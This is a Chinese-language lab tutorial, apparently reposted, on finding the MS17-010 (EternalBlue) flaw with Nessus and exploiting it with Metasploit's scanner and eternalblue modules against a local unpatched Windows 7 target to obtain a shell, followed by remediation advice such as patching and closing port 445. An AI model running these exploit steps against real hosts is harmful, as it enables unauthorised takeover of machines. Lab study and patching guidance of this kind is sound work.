ms17-010永恆之藍漏洞驗證與利用


如何發現永恆之藍?

       利用漏洞之前,首先是要發現漏洞,那么我們在做測試的時候如何去發現漏洞呢?今天我給大家介紹一款開源免費的掃描工具Nessus。Nessus號稱是世界上最流行的漏洞掃描程序,通常包括成千上萬的最新的漏洞,各種各樣的掃描選項,及易於使用的圖形界面和有效的報告。在這里我們僅需要驗證一台主機是否存在相印的漏洞即可。

下載地址:https://www.tenable.com/downloads/nessus

利用nessus發現永恆之藍漏洞

我在本地提前部署了未裝任何安全殺毒軟件、未進行過補丁升級的靶機作為測試環境。

以下為測試環境:

Win7靶機:192.168.80.101

Kali攻擊機: 192.168.80.100

Nessus:192.168.80.88

下圖為對靶機掃描的部分漏洞(摘取中高危漏洞)

 

驗證漏洞

驗證漏洞環節就需要我們用到kali攻擊機里面的metaploit工具

root@kali:~# msfconsole                      \\打開msf

msf5 > search MS17-010                       \\搜索

 

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options   \\查看選項

 

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.80.101      \\設置目標主機地址

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options                  \\查看選項

msf5 auxiliary(scanner/smb/smb_ms17_010) > run                          \\執行

 

=====================以上驗證了目標靶機存在永恆之藍漏洞=======================

msf5 > use exploit/windows/smb/ms17_010_eternalblue               \\使用攻擊模塊

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

 

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.80.101            \\設置目標靶機地址

msf5 exploit(windows/smb/ms17_010_eternalblue) > run    \\執行

 

成功獲取靶機的shell

C:\Windows\system32>chcp 65001               \\由於亂碼,需要進行設置

 

獲取到shell之后就可以為所欲為啦,你就是這台機器的主人。

======================以上為漏洞驗證過程================================

如何修復漏洞

1、 及時更新補丁

2、如果沒有使用需求,建議關閉445端口

3、 設置合理的防火牆策略並開啟防火牆

4、 本地安裝安全防護軟件,如360、火絨等

=======================請勿用於非法用途,否則后果自負====================


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM